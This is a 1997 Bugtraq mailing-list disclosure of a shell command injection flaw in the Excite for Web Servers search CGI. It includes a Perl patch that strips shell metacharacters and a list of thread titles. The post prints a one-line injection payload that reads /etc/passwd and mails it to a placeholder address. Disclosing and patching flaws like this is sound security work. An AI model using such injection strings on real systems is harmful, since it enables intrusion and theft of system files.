Bugtraq mailing list archives
CGI security hole in EWS (Excite for Web Servers)
From: marc_merlin () MAGIC METAWIRE COM (Marc Merlin)
Date: Wed, 17 Dec 1997 23:04:46 -0800
I tried a query like this one on a server where I was configuring: "this and this and that" (with the quotes) and noticed an error, so I looked at the code. Classic mistake, it launches a shell with whatever was given in the query (even though spaces are escaped with a '$'). Yet, the exploit remains simple: ";IFS="$";/bin/cat /etc/passwd|mail your_email_here; (or any other shell command you can thing of) I found the problem on what I was told was EWS 1.1 (from what I was told as I did not install it, but merely tweaked it). It's supposed to be from http://www.excite.com/navigate/ Here's a patch that fixes the problem in two places. (this library is typically in ews/ews/architext_query.pl) --- architext_query.pl 1997/12/09 00:30:13 1.4 +++ architext_query.pl 1997/12/12 21:25:31 1.7 @@ -223,8 +233,23 @@ ## do the search $timeout = "-to $maximum_query_time" if $maximum_query_time; + # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes + # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc + $query =~ s/\`//mg; + $query =~ s/\n//mg; + $query =~ s/\$//mg; + $query =~ s/\^//mg; + $query =~ s/\|//mg; + $query =~ s/\\//mg; + $query =~ s/\~//mg; + $query =~ s/\&//mg; + $query =~ s/\;//mg; + $query =~ s/\*//mg; + # Quote double quotes + $query =~ s/"/\\"/mg; $qcommand = "$queryprog -C $configfile $timeout -q \"$query\" -num $max_docs_to_return $syntax_flag"; $qcommand = &convert_file_names($qcommand); + #print "Command: $qcommand<BR>\n"; ## print $qcommand; if (open(QUERY, "$qcommand |")) { ## Accumulate the results. @@ -585,8 +610,24 @@ $urledit = $form{'urledit'}; $timeout = "-to $maximum_query_time" if $maximum_query_time; + + # Suppress backticks, newlines, dollar signs, carets, pipes, backslashes + # tilda, ampersand, semicolon, and star. Hope nothing is missing -- Marc + $query =~ s/\`//mg; + $query =~ s/\n//mg; + $query =~ s/\$//mg; + $query =~ s/\^//mg; + $query =~ s/\|//mg; + $query =~ s/\\//mg; + $query =~ s/\~//mg; + $query =~ s/\&//mg; + $query =~ s/\;//mg; + $query =~ s/\*//mg; + # Quote double quotes + $query =~ s/"/\\"/mg; $qcommand = "$queryprog -C $configfile $timeout -q \"$query\""; $qcommand = &convert_file_names($qcommand); + #print "Command: $qcommand<BR>\n"; if (open(QUERY, "$qcommand |")) { Note that this is what I found after a quick look, but other libraries may have similar bugs (like the architext.pl library but it's not used on my system, it looks like junk left around in the Excite distribution (there are many such files)). Marc PS: Sorry, I can't follow the list too closely right now, so if you want to make sure I see your message cc it to me (and if you mail me directly, replace "_" by "." between my firstname and lastname as my spam filters can only redirect answers to my messages, not a new message written from scratch). -- Home page: http://www.efrei.fr/~merlin/ (browser friendly) Finger merlin () magic metawire com for PGP key (key id 763BE901) ***** "God is real, unless declared integer." *****
Current thread:
- CERT Advisory CA-97.28 - Teardrop_Land Aleph One (Dec 16)
- <Possible follow-ups>
- Re: CERT Advisory CA-97.28 - Teardrop_Land Charles M. Hannum (Dec 16)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Alan Cox (Dec 16)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Ron Holt (Dec 19)
- SGI Security Advisory 19971201-01-P1391 - statd(1M) Buffer Overrun SGI Security Coordinator (Dec 16)
- CERT Vendor-Initiated Bulletin VB-97.16 - CrackLib Aleph One (Dec 17)
- SNI-22: RADIUS Advisory Secure Networks Inc. (Dec 17)
- Re: SNI-22: RADIUS Advisory miguel a.l. paraz (Dec 17)
- CGI security hole in EWS (Excite for Web Servers) Marc Merlin (Dec 17)
- Re: CGI security hole in EWS (Excite for Web Servers) carson () tla org (Dec 18)
- Re: SNI-22: RADIUS Advisory Thom Henderson (Dec 18)
- mIRC Worm Aleph One (Dec 18)
- Re: mIRC Worm Nigel Reed (Dec 18)
- Re: mIRC Worm Paul Wilson (Dec 18)
- StackGuard: Automatic Protection From Stack-smashing Attacks Crispin Cowan (Dec 18)
- Re: StackGuard: Automatic Protection From Stack-smashing Attacks Tim Newsham (Dec 19)
- Re: StackGuard: Automatic Protection From Stack-smashing Attacks Theo de Raadt (Dec 19)
- Xotpcalc, version 1.0 Ivan Nejgebauer (Dec 19)
- Re: CERT Advisory CA-97.28 - Teardrop_Land Alan Cox (Dec 16)
- Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2) Alex Mottram (Dec 19)